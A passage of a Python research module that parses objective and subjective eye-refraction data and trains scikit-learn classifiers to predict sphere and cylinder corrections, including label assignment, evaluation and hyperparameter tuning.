self.Left['EMR:VisualAcuityCylinder'] = self.data['EMR:VisualAcuityCylinder_Left'].apply(self.transformer.Round)\n self.Left['EMR:VisualAcuityAxis'] = self.data['EMR:VisualAcuityAxis_Left'].apply(self.transformer.Round,args=[1])\n self.Right['EMR:VisualAcuitySphere'] = self.data['EMR:VisualAcuitySphere_Right'].apply(self.transformer.Round)\n self.Right['EMR:VisualAcuityCylinder'] = self.data['EMR:VisualAcuityCylinder_Right'].apply(self.transformer.Round)\n self.Right['EMR:VisualAcuityAxis'] = self.data['EMR:VisualAcuityAxis_Right'].apply(self.transformer.Round,args=[1])\n\n # Compute cylinder delta (objective-subjective)\n self.Left['CylinderDelta'] = (self.Left['WF_CYLINDER_R_3'] -\n 
self.Left['EMR:VisualAcuityCylinder'])\n self.Right['CylinderDelta'] = (self.Right['WF_CYLINDER_R_3'] -\n self.Right['EMR:VisualAcuityCylinder'])\n\n # Compute sphere delta\n self.Left['SphereDelta'] = (self.Left['WF_SPHERE_R_3'] -\n self.Left['EMR:VisualAcuitySphere'])\n self.Right['SphereDelta'] = (self.Right['WF_SPHERE_R_3'] -\n self.Right['EMR:VisualAcuitySphere'])\n\n # compute spherical equivalent\n self.Left['ObjectiveSphericalEquivalent'] = (self.Left['WF_SPHERE_R_3']+\n self.Left['WF_CYLINDER_R_3']/2)\n self.Left['SubjectiveSphericalEquivalent'] = (self.Left['EMR:VisualAcuitySphere'] +\n self.Left['EMR:VisualAcuityCylinder']/2)\n self.Right['ObjectiveSphericalEquivalent'] = (self.Right['WF_SPHERE_R_3']+\n self.Right['WF_CYLINDER_R_3']/2)\n self.Right['SubjectiveSphericalEquivalent'] = (self.Right['EMR:VisualAcuitySphere'] +\n self.Right['EMR:VisualAcuityCylinder']/2)\n\n # Compute spherical equivalent delta\n self.Left['SphericalEqDelta'] = (self.Left['ObjectiveSphericalEquivalent'] -\n self.Left['SubjectiveSphericalEquivalent'])\n self.Right['SphericalEqDelta'] = (self.Right['ObjectiveSphericalEquivalent'] -\n self.Right['SubjectiveSphericalEquivalent'])\n\n # Filter out features outside the input ranges\n validIndsL = np.ones(shape=len(self.Left),dtype=np.bool)\n validIndsR = np.ones(shape=len(self.Right),dtype=np.bool)\n for dk,dv in self.featureList.items():\n if len(dv)>0:\n newIndsL = (self.Left[dk]<=np.max(dv))&(self.Left[dk]>=np.min(dv))\n newIndsR = (self.Right[dk]<=np.max(dv))&(self.Right[dk]>=np.min(dv))\n # print(f'{dk} numValidL: {newIndsL.sum()}')\n # print(f'{dk} numValidR: {newIndsR.sum()}')\n validIndsL = validIndsL&newIndsL\n validIndsR = validIndsR&newIndsR\n self.Left = self.Left.loc[validIndsL]\n self.Right = self.Right.loc[validIndsR]\n\n # Rearrange indices =\n self.Left.index = range(len(self.Left))\n self.Right.index = range(len(self.Right))\n\n # Append for Both eyes\n self.Both = self.Left.append(self.Right)\n # Rearrange the indices for Both\n self.Both.index = range(len(self.Both))\n\n self.dataParsed = True\n\n def GetLabelsFromDeltas(self,data,classes,groupEndBins=True):\n '''\n assign laels to the data in data according to classes in classes\n Parameters:\n ----------\n data\n '''\n labels = data.apply(self._AssignLabel,args=[classes,groupEndBins]).to_frame()\n labels.index = data.index\n return labels\n\n def GetClasses(self,data,predict='correction',target='se',\n delta=0.25,sphereDelta=None,cylinderDelta=None,groupEndBins=False,discardUnlabeled=False):\n \"\"\"\n Get labels for eyes based on the Delta set.\n\n Parameters:\n -----------\n predict: {'deltaSet','correction'},str\n labels for the prediction of delta-set or correction\n target : {'seDelta', 'cylinderDelta', 'sphereDelta' }, default='seDelta\n the Delta set\n eye : {'right', 'left','both' } , default='both'\n data to use\n delta : float, default=0.25\n a positive sclar defining the Delta set by |Delta|<=delta\n groupEndBins: bool, default=False\n observations lower/higher than min/max(cylinderDelta) or min/max(sphereDelta) are assigned end class labels\n discardUnlabeled: bool, default=False\n if set to True observation with labels not matching any of the vlaued of cylinder or sphereDelta are discarded\n otherwise, unlabeled observations are grouped and assigned the integer label numClasses+1\n\n Output:\n ---------\n classes :\n for predict='deltaset'\n a binary vector the same size as self.target with 1 for |Delta|<=delta , 0 otherwise\n for predict = 'correction'\n a vector of 
integer classes indicating the correction from objective to subjective\n the class number correspond to the correction needed in the array of sphDelta or cylDelta\n \"\"\"\n\n if self.dataParsed:\n # data = self.GetData(eye=eye)\n if predict.lower()=='deltaset':\n if target.lower()=='se':\n classes = np.where(np.abs(data['SphericalEqDelta'])<=delta,1,0)\n elif target.lower()=='cylinder':\n classes = np.where(np.abs(data['CylinderDelta'])<=delta,1,0)\n elif target.lower()=='sphere':\n classes = np.where(np.abs(data['SphereDelta'])<=delta,1,0)\n else:\n raise Exception('Option {} is not supported'.format(target))\n\n elif predict.lower()=='correction':\n classes = np.zeros(len(data),dtype=np.int)\n if target.lower()=='cylinderdelta':\n numClasses = len(cylinderDelta)\n if cylinderDelta==None:\n raise Exception('cylinderDelta bins must be defined')\n for lIdx in range(len(data)):\n try:\n if groupEndBins:\n if data.loc[data.index[lIdx],'CylinderDelta']np.max(cylinderDelta):\n classes[lIdx] = numClasses-1\n else:\n classes[lIdx] = cylinderDelta.index(data.loc[data.index[lIdx],'CylinderDelta'])\n else:\n classes[lIdx] = cylinderDelta.index(data.loc[data.index[lIdx],'CylinderDelta'])\n except:\n # classes[lIdx] = numClasses\n classes[lIdx] = -1\n elif target.lower()=='cylinder':\n numClasses =len(cylinderDelta)\n if cylinderDelta==None:\n raise Exception('cylinderDelta bins must be defined')\n for lIdx in range(len(data)):\n try:\n classes[lIdx] = cylinderDelta.index(data.loc[lIdx,'EMR:VisualAcuityCylinder'])\n except:\n classes[lIdx] = -1\n\n elif target.lower()=='spheredelta':\n if sphereDelta==None:\n raise Exception('sphere delta must be defined')\n for lIdx in range(len(data)):\n try:\n if groupEndBins:\n if data.loc[data.index[lIdx],'SphereDelta']np.max(sphereDelta):\n classes[lIdx] = numClasses-1\n else:\n classes[lIdx] = sphereDelta.index(data.loc[data.index[lIdx],'SphereDelta'])\n else:\n classes[lIdx] = sphereDelta.index(data.loc[data.index[lIdx],'SphereDelta'])\n except:\n classes[lIdx] = -1\n elif target.lower()=='sphere':\n if sphereDelta==None:\n raise Exception('sphere delta must be defined')\n for lIdx in range(len(data)):\n try:\n classes[lIdx] = sphereDelta.index(data.loc[data.index[lIdx],'EMR:VisualAcuitySphere'])\n except:\n classes[lIdx] = -1\n elif target.lower()=='both':\n if sphereDelta==None or cylinderDelta==None:\n raise Exception('sphreDelta and cylinderDelta must be defined')\n correctionPairs = list(itertools.product(sphereDelta,cylinderDelta))\n # Assign labels based on the correction pairs\n for pIdx in range(len(data.index)):\n try:\n classes[pIdx] = correctionPairs.index(data.loc[data.index[pIdx],'SphereDelta'],data.loc[data.index[pIdx],'CylinderDelta'])\n except:\n classes[pIdx] = -1\n else:\n raise Exception('Option target={} is not supported'.format(target))\n return classes\n else:\n print('Data not loaded or not parsed')\n return None\n\n @ staticmethod\n def _AssignLabel(val,classes,groupEndBins=True):\n '''\n Assign labels from classes to a values\n val-, float\n the delta between objective and subjective (spher or cylinder)\n classes, list\n a list of possible deltas, the order in the list will determine the class number\n groupEndBins, bool, default=True\n if valmax(classes) it will be assigned len(classes)-1\n Output:\n -------\n label, float\n a number corresponding to the class in classes\n\n '''\n\n if groupEndBins:\n m = min(classes)\n M = max(classes)\n if valM:\n return len(classes)-1\n else:\n try:\n return classes.index(val)\n except:\n return 
-1\n else:\n try:\n return classes.index(val)\n except:\n return -1\n\n def GetFeatureMatrix(self,data, features='all',random=False):\n \"\"\"\n Get feature matrix.\n\n Parameters:\n ------------\n features : {'all',list}, default='auto'\n 'all' - use all features in self.featureList\n or a list of indices from self.featureList\n eye : {'left', 'right', 'both'}, default='both'\n data to use\n autoSelectFeatures: {True,False}, bool, default=False\n automatic feature selection\n Output:\n ---------\n fMat- dataFrame\n feature matrix with columns corresponding to features and rows for observations\n \"\"\"\n featureMat = data\n featureMat = featureMat.loc[:,self.featureList.keys()]\n if random:\n featureMat = self.GenerateRandomPatient(N=len(featureMat))\n\n # Feature indices to use\n if features.__class__ is str:\n if features.lower()=='all':\n fInds = range(len(self.featureList.keys()))\n else:\n raise Exception('option features={} is not supported'.format(features))\n elif features.__class__ is list:\n fInds = features\n else:\n raise Exception('option features={} is not supported'.format(features))\n\n # Set features used\n self.featuresUsed = np.asanyarray(list(self.featureList.keys()))[fInds]\n\n # Return a feature matrix\n return featureMat.loc[:,self.featuresUsed]\n\n def PredictDeltaSet(self,classifier='rf',target='se',\n eye='both',numTrials=10,delta=0.25,trainProp=0.8,\n features='all',autoSelectFeatures = False,\n equalizeTrainingClasses=False,\n classifierParams=dict(),alpha=0.05):\n \"\"\"\n Binary classification to predict inclusion in the Delta set\n based on selected prognostic factors. The Delta set\n is either the spherical equivalent delta, cylinder or sphere delta.\n In all cases, patient within Delta set are those for which |Delta|<=delta,\n with delta a positive scalar.\n\n Parameters:\n -----------\n classifier: {'rf','ab','dt','lr','svm','lda','qda','nb','nn'}, str, default=knn\n rf- random forest,\n ab-adaboost,\n dt- decision tree,\n lr- logistic regression,\n svm- support vector machine,\n lda- linear discriminant analysis,\n qda- quadratic discriminant analysis\n nb- naive bayes,\n nn- neural network\n knn - k-nearest neighbors\n target: {'se','sphere','cylinder'},str, default='seDelta'\n Defining the Delta set\n 'se' - spherical equivalent delta;\n 'sphere' - sphere delta, or sphere correction\n 'cylinder'- cylinder delta, or cylinder correction\n the delta is defined as the objective minus subjective\n eye: {'left','right','both'}, str, default='both'\n data to use for classification\n numTrials: int, default=10\n positive integer defining the number of rounds to run classifier\n delta: float, default = 0.25\n positive scalar defining the set |Delta|<=delta\n trainProp: float, default=0.8\n training proportion, positive scalar smaller than 1\n features: {'all','auto', list}, default='auto'\n 'all'- use all features in self.featureList\n 'auto'- selects features automatically by KS statistics ath the confidence level of 1-alpha\n standardize: bool, default=True\n if True, subtract the mean and divide each feature by its STD\n equalizeTrainingClasses: bool, default=False\n make equal the proportion of each class during training\n alpha: float, default=0.05\n the KS confidence = 1-alpha, in case autoSelectFeatures=True\n \"\"\"\n # Get labels\n data = self.GetData(eye=eye)\n patClass = self.GetClasses(data,predict='deltaSet',delta=delta,target=target)\n fMat = self.GetFeatureMatrix(data,features=features,random=False)\n if autoSelectFeatures:\n # select features 
(columns of the feature matrix) by KS test\n fMat = self.SelectFeatures(fMat,patClass,alpha=alpha)\n\n # Preallocations\n results = pd.DataFrame()\n success = np.zeros(numTrials)\n failed = np.zeros(numTrials)\n sucPer = np.zeros(numTrials)\n score = np.zeros(numTrials)\n featureRank = np.zeros(shape=fMat.shape[1])\n meanCoeffs = np.ndarray(shape=fMat.shape[1])\n\n for tIdx in range(numTrials):\n print(\"Testing round {}/{}\".format(tIdx+1,numTrials))\n\n # Construct a classifier for the current test\n model = self.GetClassifier(params=classifierParams)\n # Randomly divide the data into training and testing sub-sets\n trainIdx,testIdx = self.GetTrainingAndValidationIndices(patClass,trainProp=trainProp,\n equalizeTrainingClasses=equalizeTrainingClasses)\n featureMatTrain = fMat.loc[fMat.index[trainIdx],self.featuresUsed].values\n featureMatTest = fMat.loc[fMat.index[testIdx],self.featuresUsed].values\n if fMat.shape[1]==1:\n # Reshape to meet function requirements\n featureMatTrain = featureMatTrain.reshape(-1,1)\n featureMatTest = featureMatTest.reshape(-1,1)\n labelMatTrain = patClass[trainIdx]\n labelMatTest = patClass[testIdx]\n\n # Fit model on training data\n model.fit(featureMatTrain, labelMatTrain)\n\n # Predict\n predictedLabels = model.predict(featureMatTest)\n score[tIdx] = model.score(featureMatTest,labelMatTest)\n # Collect results\n success[tIdx] = sum(predictedLabels==labelMatTest)\n failed[tIdx] = len(labelMatTest)-success[tIdx]\n sucPer[tIdx] = 100*success[tIdx]/len(testIdx)\n\n # Result summary to return\n results.loc[0,'succ_mean'] = np.mean(sucPer)\n results.loc[0,'succ_std'] = np.std(sucPer)\n results.loc[0,'succ_max'] = np.max(sucPer)\n results.loc[0,'succ_min'] = np.min(sucPer)\n results.loc[0,'mean_score'] = np.mean(score)\n results.loc[0,'N_train'] = len(trainIdx)\n results.loc[0,'N_test'] = len(testIdx)\n results.loc[0,'N_in_train'] = sum(labelMatTrain)\n results.loc[0,'N_in_test'] = sum(labelMatTest)\n results.loc[0,'N_succ_mean'] = np.mean(success)\n results.loc[0,'N_succ_std'] = np.std(success)\n results.loc[0,'N_fail_mean'] = np.mean(failed)\n results.loc[0,'N_fail_std'] = np.std(failed)\n\n # Construct a histogram of importance of features\n if np.isin(classifier.lower(),['logisticregression','lr']):\n self.featureRank = featureRank/(np.sum(featureRank)*numTrials) # normalize\n self.meanCoeffs = meanCoeffs/numTrials # mean values\n elif np.isin(classifier.lower(),['decisiontree','dt','randomforest','rf']):\n self.featureRank = model.feature_importances_\n\n return results\n\n def GenerateRandomPatient(self,N=1,eye='both'):\n \"\"\"\n Generate a random patient by sampling feature values from empirical feature distribution\n \"\"\"\n fMat = pd.DataFrame()\n data = self.GetData(eye=eye)\n for f in self.featureList.keys():\n # compute feature empirical distribution\n # uVals = list(np.unique(data[f]))\n p = np.zeros(len(data[f]))\n for uIdx in range(len(data[f])):\n p[uIdx] = np.sum(data[f]==data.loc[uIdx,f])\n p = p/np.sum(p)\n\n # randomly select values for feature based on the empirical distribution\n fMat[f] = np.random.choice(data[f],size=N,p=p)\n return fMat\n\n def PredictCorrection(self,eye='both',target='cylinder',\n numTrials=5,classifier='rf',\n trainProp=0.8,\n sphereDelta=[-0.5,-0.25, 0.0, 0.25],\n cylinderDelta=[-0.25, 0.0],\n equalizeTrainingClasses=False,\n classifierParams={},features='all',\n autoSelectFeatures=False,alpha=0.05,\n featureSelectionMode='fpr',\n rejProp=0.8,\n groupEndBins=False):\n \"\"\"\n Predict the sphere-cylinder correction 
pairs.\n\n Parameters:\n -----------\n eye: {'left,'right','both'},str default='both'\n data to use\n target: {'sphere','cylinder','both'}, str, default='cylinder'\n classify into cylinder correction classes, sphere correction classes,\n or all combinations of sphere and cylinder pairs defained by sphereDelta, cylinderDelta\n for cylinderDelta, the sphereDelta range is ignored;\n for sphereDelta, the cylinderDelta range is ignored.\n numTrials: int, default=5\n number of times to run the classifier\n classifier: {'lr','dt','knn','nb','nn','lda','qda','rf'}, str, default='rf'\n classifier to use. see Getclassifier for options\n standardize: {True,False}, bool, default=True\n standardize the trining and validation data\n trainProp: float, default=0.9\n proportion of the data used for training\n equalizeTrainingClasses: bool, default=False\n make the size of classes equal in the training data\n autoSelectFeatures: bool. default=True\n automatically select features by pairwise kolmogorov smirnoff test\n alpha: float, default=0.05\n the confidence level of the KS test conf=1-alpha, for which to reject the null hypothesis\n is case autoSelectFeatures=True\n rejProp: float, default==0.8\n in pairswise KS test, select those features which their null hypothesis is\n rejected at least round(rejProp*(numClasses-1)) times\n groupEndBins: bool, default=True\n observations with deltamax are assigned end bins' labels\n Output:\n --------\n res: dataframe\n statistics and accuracy results for the classification\n confMat: array\n confusion matrix\n \"\"\"\n\n data = self.GetData(eye=eye) # Get parsed data\n\n # This gives a total of |cylinderDelta|x|sphereDelta| number of classes\n # Discard all patients for whom the correction (delta) is not in the correction pairs\n fMat = self.GetFeatureMatrix(data,features=features)\n\n labels = self.GetClasses(data,predict='correction',\n target=target,\n sphereDelta=sphereDelta,\n cylinderDelta=cylinderDelta,\n groupEndBins=groupEndBins)\n\n # Discard unlabeled, truncate the labels and the feature matrix accordingly\n print(f'Discarding {sum(labels==-1)} unlabeled observations ({100*sum(labels==-1)/len(labels)}%, remaining {sum(labels!=-1)})')\n validInds = np.where(labels!=-1)[0]\n labels = labels[validInds]\n fMat = fMat.iloc[validInds]\n data = data.iloc[validInds]\n numClasses = len(np.unique(labels))\n correctionPairs = list(itertools.product(sphereDelta,cylinderDelta))\n\n # Select features automatically by a pairwise ks test\n if autoSelectFeatures:\n fMat = self.SelectFeatures(fMat,labels,alpha=alpha,mode=featureSelectionMode)\n # Construct empirical distributions of classes to draw samples from\n classProb = np.zeros(numClasses,dtype=np.int)\n for pIdx in range(numClasses):\n classProb[pIdx] = np.sum(labels==pIdx)\n classProb = classProb/sum(classProb)\n\n # Previous objective and subjective sphere and cylinder\n objSphere = data['WF_SPHERE_R_3']\n subSphere = data['EMR:VisualAcuitySphere']\n objCylinder = data['WF_CYLINDER_R_3']\n subCylinder = data['EMR:VisualAcuityCylinder']\n sphDelta = objSphere - subSphere\n cylDelta = objCylinder - subCylinder\n\n # Preallocations\n res = pd.DataFrame()\n accuracy = np.zeros(numTrials, dtype=np.float)\n accuracyRand = np.zeros(numTrials, dtype=np.float)\n delta0_25_before = np.zeros(numTrials, dtype=np.float)\n delta0_5_before = np.zeros(numTrials, dtype=np.float)\n delta0_25_after = np.zeros(numTrials, dtype=np.float)\n delta0_5_after = np.zeros(numTrials, dtype=np.float)\n deltaRand0_25 = np.zeros(numTrials, 
dtype=np.float)\n deltaRand0_5 = np.zeros(numTrials, dtype=np.float)\n confMat = np.zeros(shape=(numClasses,numClasses),dtype=np.float)\n # featureRank = np.zeros(shape=fMat.shape[1])\n # Main loop - classifiy\n for tIdx in range(numTrials):\n # Construct a model to predict the delta sphere\n print(f'Trial {tIdx+1}/{numTrials}')\n trainIdx, testIdx = self.GetTrainingAndValidationIndices(labels,trainProp=trainProp,\n equalizeTrainingClasses=equalizeTrainingClasses)\n # Get feature matrix and labels for the current trial\n featureMatTrain = fMat.loc[fMat.index[trainIdx]]\n featureMatTest = fMat.loc[fMat.index[testIdx]]\n labelsTrain = labels[trainIdx]\n labelsTest = labels[testIdx]\n\n # Get classifier for the current trial\n model = self.GetClassifier(params=classifierParams)\n # Train\n model.fit(featureMatTrain,labelsTrain)\n\n # Predict correction\n predictedLabels = model.predict(featureMatTest)\n oldSph = objSphere.loc[objSphere.index[testIdx]].values\n oldCyl = objCylinder.loc[objCylinder.index[testIdx]].values\n\n seDeltaOld = sphDelta.loc[sphDelta.index[testIdx]]+cylDelta.loc[cylDelta.index[testIdx]]/2\n newSph = np.zeros(len(testIdx))\n newCyl = np.zeros(len(testIdx))\n\n accuracy[tIdx] = 100*model.score(featureMatTest,labelsTest)\n # Compute the confusion matrix for this trial\n for prlIdx in range(len(predictedLabels)):\n confMat[labelsTest[prlIdx],predictedLabels[prlIdx]]+=1\n if target.lower()=='cylinderdelta':\n newCyl[prlIdx] = oldCyl[prlIdx] - cylinderDelta[predictedLabels[prlIdx]]\n elif target.lower()=='cylinder':\n newCyl[prlIdx] = cylinderDelta[predictedLabels[prlIdx]]\n elif target.lower()=='spheredelta':\n newSph[prlIdx] = oldSph[prlIdx] - sphereDelta[predictedLabels[prlIdx]]\n elif target.lower()=='sphere':\n newSph[prlIdx] = sphereDelta[predictedLabels[prlIdx]]\n elif target.lower()=='both':\n for prlIdx in range(len(testIdx)):\n newSph[prlIdx]= oldSph[prlIdx] - correctionPairs[predictedLabels[prlIdx]][0]\n newCyl[prlIdx]= oldCyl[prlIdx] - correctionPairs[predictedLabels[prlIdx]][1]\n else:\n raise Exception(f'option: {target} is not supported')\n\n # Assign the correction to the objective and compute the spherical Eq delta\n if np.isin(target.lower(),['cylinder','cylinderdelta']):\n deltaNew = newCyl - subCylinder.loc[subCylinder.index[testIdx]].values\n deltaOld = cylDelta.loc[cylDelta.index[testIdx]]\n delta0_25_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.25)[0])/len(deltaNew)\n delta0_5_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.5)[0])/len(deltaNew)\n delta0_25_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.25)[0])/len(deltaOld)\n delta0_5_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.5)[0])/len(deltaOld)\n elif np.isin(target.lower(),['sphere','spheredelta']):\n deltaNew = newSph - subSphere.loc[subSphere.index[testIdx]].values\n deltaOld = sphDelta.loc[sphDelta.index[testIdx]]\n delta0_25_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.25)[0])/len(testIdx)\n delta0_5_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.5)[0])/len(testIdx)\n delta0_25_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.25)[0])/len(testIdx)\n delta0_5_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.5)[0])/len(testIdx)\n elif target.lower()=='both':\n deltaNew = newSph+newCyl/2 - (oldSph+oldCyl/2)\n deltaOld = seDeltaOld\n delta0_25_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.25)[0])/len(testIdx)\n delta0_5_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.5)[0])/len(testIdx)\n delta0_25_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.25)[0])/len(testIdx)\n delta0_5_before[tIdx] = 
len(np.where(np.abs(deltaOld)<=0.5)[0])/len(testIdx)\n\n\n # sphEqDeltaNew = newSph+newCyl/2\n # delta0_25_after[tIdx] = len(np.where(np.abs(sphEqDeltaNew)<=0.25)[0])/len(testIdx)\n # delta0_5_after[tIdx] = len(np.where(np.abs(sphEqDeltaNew)<=0.5)[0])/len(testIdx)\n\n # draw correction pairs by random samples for the empirical distribution\n randSphCorr = np.zeros(len(testIdx),dtype=np.float)\n randCylCorr = np.zeros(len(testIdx),dtype=np.float)\n rndSucc = np.zeros(len(testIdx),dtype=np.int)\n for pIdx in range(len(testIdx)):\n corrInd = np.random.choice(range(numClasses),p=classProb)\n rndSucc[pIdx] = corrInd==labelsTest[pIdx]\n if target.lower()=='cylinder':\n randCylCorr[pIdx] = cylinderDelta[corrInd]\n randSphCorr[pIdx] = 0\n elif target.lower()=='sphere':\n randSphCorr[pIdx] = sphereDelta[corrInd]\n randCylCorr[pIdx] = 0\n elif target.lower()=='both':\n randSphCorr[pIdx] = correctionPairs[corrInd][0]\n randCylCorr[pIdx] = correctionPairs[corrInd][1]\n\n newSphRand = oldSph - randSphCorr\n newCylRand = oldCyl - randCylCorr\n accuracyRand[tIdx] = 100*sum(rndSucc)/len(testIdx)\n sphEqRand = (newSphRand) + (newCylRand)/2\n deltaRand0_25[tIdx] = len(np.where(sphEqRand<=0.25)[0])/len(testIdx)\n deltaRand0_5[tIdx] = len(np.where(sphEqRand<=0.5)[0])/len(testIdx)\n\n # Construct a histogram of importance of features\n self.featureRank = model.feature_importances_\n\n # Summarize results\n res.loc[0,'succ_mean'] = np.mean(accuracy)\n res.loc[0,'succ_min'] = np.min(accuracy)\n res.loc[0,'succ_max'] = np.max(accuracy)\n res.loc[0,'mean_delta_0_25_before'] = np.mean(delta0_25_before)\n res.loc[0,'mean_delta_0_25_after'] = np.mean(delta0_25_after)\n res.loc[0,'mean_delta_0_5_before'] = np.mean(delta0_5_before)\n res.loc[0,'mean_delta_0_5_after'] = np.mean(delta0_5_after)\n res.loc[0,'mean_delta_0_25_rand'] = np.mean(deltaRand0_25)\n res.loc[0,'mean_delta_0_5_rand'] = np.mean(deltaRand0_5)\n res.loc[0,'succ_rand'] = np.mean(accuracyRand)\n res.loc[0,'succ_std'] = np.std(accuracy)\n res.loc[0,'N'] = len(labels)\n res.loc[0,'N_train'] = len(trainIdx)\n res.loc[0,'N_test'] = len(testIdx)\n\n # for cIdx in range(len(confMat)):\n # confMat[cIdx] = confMat[cIdx]/np.sum(confMat)\n return res, confMat/np.sum(confMat)\n\n def GetData(self,eye='both'):\n \"\"\"\n Get data from left right or both eyes\n Parameters:\n --------\n eye: {'left','right','both'}\n\n \"\"\"\n if eye.lower()=='left':\n data = self.Left.copy()\n elif eye.lower()=='right':\n data = self.Right.copy()\n elif eye.lower()=='both':\n data = self.Both.copy()\n else:\n raise Exception('option eye={} is nnot supported'.format(eye))\n\n return data\n\n def TuneHyperParameters(self,classifier='rf',paramDomain=None,\n target='cylinder',predict='correction',\n cylinderDelta = [-1,-0.75,-0.5,-0.25,0.0],\n sphereDelta = [-0.75,-0.5,-0.25,0,0.25,0.5,0.75],\n eye='both', features='all',\n searchType = 'random',\n n_iter = 100,crossValidations=3):\n \"\"\"\n Use the hyperparameter tuning method in sklearn to tune parameters\n and obtained a trained classifier\n Parameters:\n ------------\n paramDomain: dictionary, default=None\n a dictionary with names of parameters as keys and values to check as values\n A sample parameter domain can be obtained from self.GenerateParameterDomain\n target: {}\n\n \"\"\"\n if paramDomain is None:\n paramDomain = self.GenerateParameterDomain(classifier=classifier) # use default parameter domain\n\n model = self.GetClassifier()\n # prepare data\n if eye.lower()=='left':\n data = self.Left\n elif eye.lower()=='right':\n 
            data = self.Right\n        elif eye.lower()=='both':\n            data = self.Both\n        else:\n            raise Exception('option eye={} is not supported'.format(eye))\n        featMat = self.GetFeatureMatrix(data,features=features)\n        # get classes for the same eye selection as the features (the original always passed self.Both here,\n        # which mismatches the feature matrix whenever eye!='both')\n        classes = self.GetClasses(data,predict=predict,target=target,\n                                  cylinderDelta=cylinderDelta,\n                                  sphereDelta=sphereDelta)\n\n        # truncate missing classes from data\n        inds = np.where(classes!=-1)[0]\n        print(f\"Using {len(inds)}/{len(classes)} ({100*len(inds)/len(classes):.1f}%) observations\")\n        data = data.iloc[inds]\n        classes = classes[inds]\n        featMat = featMat.iloc[inds]\n        # get training and validation indices\n        training, testing = self.GetTrainingAndValidationIndices(classes)\n\n        # Random search of parameters, using n-fold cross validation,\n        # search across different combinations, and use all available cores\n        if searchType.lower()=='random':\n            tunedClassifier = RandomizedSearchCV(estimator = model, param_distributions = paramDomain,\n                                                 n_iter = n_iter, cv = crossValidations,\n                                                 verbose=2, random_state=42,\n                                                 n_jobs = -1)\n        elif searchType.lower()=='grid':\n            tunedClassifier = GridSearchCV(estimator = model, param_grid = paramDomain,\n                                           cv = crossValidations,\n                                           verbose=2,\n                                           n_jobs = -1)\n        # Fit the search model\n        tunedClassifier.fit(featMat.iloc[training], classes[training])\n\n        # print statistics\n        predictedLabels = tunedClassifier.best_estimator_.predict(featMat.iloc[testing])\n        print(f'Classifier Score {tunedClassifier.best_estimator_.score(featMat.iloc[testing],classes[testing])}')\n        # Construct confusion matrix\n        if target.lower() == 'cylinder':\n            confMat = np.zeros(shape=(len(cylinderDelta),len(cylinderDelta)))\n        elif target.lower() =='sphere':\n            confMat = np.zeros(shape=(len(sphereDelta),len(sphereDelta)))\n\n        groundTruth = classes[testing]\n        for pIdx in range(len(predictedLabels)):\n            confMat[int(groundTruth[pIdx]),int(predictedLabels[pIdx])]+=1\n\n        print('____ Results ____')\n        print(f'Accuracy {target}=0: {np.sum(np.diag(confMat))/np.sum(confMat)}')\n        print(f'Accuracy {target}<=0.25: {(np.sum(np.diag(confMat))+np.sum(np.diag(confMat,1))+np.sum(np.diag(confMat,-1)))/np.sum(confMat)}')\n        print(f'Accuracy {target}<=0.5: {(np.sum(np.diag(confMat))+np.sum(np.diag(confMat,1))+np.sum(np.diag(confMat,-1))+np.sum(np.diag(confMat,2))+np.sum(np.diag(confMat,-2)))/np.sum(confMat)}')\n\n        # Attach the sphere/cylinder class values and feature names to the trained classifier\n        classifier = tunedClassifier.best_estimator_\n        classifier.featuresUsed = self.featuresUsed\n        classifier.sphereDelta = sphereDelta\n        classifier.cylinderDelta = cylinderDelta\n        classifier.predictionType = predict\n        return classifier, confMat\n\n    def GridFitClassifier(self,classifier='rf',\n                          maximize='min',\n                          predict='correction',target='cylinder',\n                          delta=0.25,eye='both',\n                          numTrials=10,features='all',\n                          autoSelectFeatures=False,\n                          standardize=False,alpha=0.05,\n                          rejProp=0.667,trainProp=0.8,\n                          sphereDelta=[-0.5,-0.25,0.0,0.25,0.5],\n                          cylinderDelta =[-0.75,-0.5,-0.25,0.0],\n                          equalizeTrainingClasses=False):\n\n        \"\"\"\n        DEPRECATED, now replaced by TuneHyperParameters\n        Tune hyper-parameters of a classifier by training and validating it at each point of a parameter grid.\n\n        Parameters:\n        --------------\n        classifier: list, default=['lr','knn']\n            classifiers to evaluate\n        predict: {'correction','deltaset'}, str, default='correction'\n            predict delta set spherical equivalent, cylinder delta or sphere delta,\n            as specified by target, or correction, sphere correction, cylinder correction\n            or both as specified by target.\n        target: {'se','cylinder','sphere'}, str, 
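`TuneHyperParameters` delegates the search itself to scikit-learn. A minimal standalone version of the random-search path, with a synthetic feature matrix standing in for the real one:

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import RandomizedSearchCV

rng = np.random.default_rng(42)
featMat = rng.normal(size=(200, 12))     # stands in for the real feature matrix
classes = rng.integers(0, 4, size=200)   # stands in for the correction classes

paramDomain = {'max_depth': [100, 200, 300],
               'n_estimators': [100, 300, 500],
               'criterion': ['gini', 'entropy'],
               'min_samples_split': [2, 5, 10]}

# sample 10 parameter settings, score each with 3-fold cross validation
search = RandomizedSearchCV(estimator=RandomForestClassifier(),
                            param_distributions=paramDomain,
                            n_iter=10, cv=3, random_state=42, n_jobs=-1)
search.fit(featMat, classes)
print(search.best_params_)
print(search.best_estimator_.score(featMat, classes))
```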
default='cylinder'\n for predict='deltaSet', the spherical equivalent (se), the cylinderDelta (cylinder)\n or the sphereDelta (sphere) are the zero set in the binary classification problem.\n when predict='correction', target determines whether classification is\n performed on cylinder correction using the classes defined in cylinderDelta\n\n sphereDelta: {list}, default=[-0.5,-0.25,0.0,0.25]\n value of sphere correction to classify to.\n only taken into acount if predict='correction', and target='sphere or 'both'\n cylinderDelta: {list}, default=[-0.25,0.0],\n value of cylinder correction to classify to .\n Only taken into account if predict='correction', and target='cylinder' or 'both'\n delta: float, default=0.25\n defines the Delta set for which |Delta|<=delta\n for predict='deltaSet'\n eye: {'left','right','both'}, str, default='both'\n Perform classification on the data for a specific eye\n maximize: {'min','max','mean}, str, default='min'\n chose those set of parameters which either maximize the\n minimal accuracy (min), average accuracy (mean), or maximal accuracy (max)\n Output:\n 